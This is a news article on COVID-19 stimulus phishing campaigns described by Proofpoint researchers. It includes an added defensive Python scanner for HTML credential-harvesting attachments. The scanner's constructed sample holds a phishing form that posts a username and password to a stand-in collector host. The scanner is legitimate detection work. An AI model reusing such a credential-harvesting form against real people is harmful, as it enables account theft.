Researchers at cybersecurity firm Proofpoint have published details of some of the most prevalent phishing attacks related to the COVID-19 coronavirus, and attackers are using false cash stimulus ‘promises’ as bait.
Genuine cash stimulus packages from governments and banks are common while COVID-19 damages people and economies. Cybercriminals have seen the potential and have impersonated these institutions, and even the World Health Organization (WHO) itself.
In one case, a phishing campaign targeted at tech and IT firms worldwide claims to come from the WHO and the International Monetary Fund (IMF). It says the recipient has been ‘randomly selected’ for financial compensation due to COVID-19. To claim their funds, they must view and print the attached document.
The email contains a malicious Excel-branded attachment, called COVID-1918-COMPENSATION.html, that asks for a username and password when opened. Attackers have then collected those usernames and passwords.
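A mail-gateway style check for the lure described above, as an added example that is not from Proofpoint or the original article: it flags HTML attachments that contain a password field and lists the hosts their forms submit to. Only the attachment filename comes from the article; the message, the form markup and the `*.example` hosts are constructed.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse


class CredentialFormFinder(HTMLParser):
    """Counts password inputs and records form targets in an HTML document."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))


def scan_message(raw_bytes):
    """Return one finding per HTML attachment that asks for a password."""
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if part.get_content_type() != "text/html" and not name.lower().endswith((".html", ".htm")):
            continue
        finder = CredentialFormFinder()
        finder.feed((part.get_payload(decode=True) or b"").decode("utf-8", "replace"))
        if finder.password_inputs:
            hosts = {urlparse(u).hostname for u in finder.form_actions}
            findings.append({"attachment": name, "post_hosts": sorted(h for h in hosts if h)})
    return findings


def build_sample():
    """Constructed message: markup and *.example hosts are made up for this example."""
    msg = EmailMessage()
    msg["From"], msg["To"] = "relief@sender.example", "user@recipient.example"
    msg.set_content("View and print the attached document to claim your funds.")
    html = ('<form action="https://collector.example/post" method="post">'
            '<input name="user"><input type="password" name="pass"></form>')
    msg.add_attachment(html.encode(), maintype="text", subtype="html",
                       filename="COVID-1918-COMPENSATION.html")
    msg.add_attachment(b"meeting notes", maintype="text", subtype="plain", filename="notes.txt")
    return msg.as_bytes()
```

A form with an empty or relative `action` still produces a finding, with an empty `post_hosts` list, because the password field alone is the signal.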
In another case, attackers have impersonated a major Australian newspaper to trick recipients into clicking an attachment with an embedded URL that then spoofs a OneDrive login page.
According to Proofpoint researchers, the email claims that the “Government has released its stimulus package in response to the Coronavirus outbreak” and encourages the recipient to open the malicious attachment for more details.
When users click the link, a spoofed OneDrive login page collects user information.
Proofpoint researchers comment that the emails are actually delivered by a “Romanian top-level domain address of ‘.ro.’” To appear authentic, the message includes supposed contact information for the paper and notes that they are “…happy to advise that we have now moved back to” the address provided. It's notable that the address in the email does not match the newspaper being spoofed.
In a third case, attackers targeted US healthcare and higher education institutions in a campaign claiming that the Trump administration may send US adults a check for $1000 to stimulate the economy.
That, however, is false: people who click the link are taken to a phishing page that asks for domain/username, email address, and password.
“The messages are notable for its crude design, as the message has clear grammar and usage errors and uses a basic webpage clearly branded by a free website maker for its credential phishing,” say Proofpoint researchers.
The researchers say the wider implication of these phishing attempts is that attackers are using ‘social engineering at scale’. Researchers believe the attackers will continue to change their attack strategies to keep up with news about COVID-19.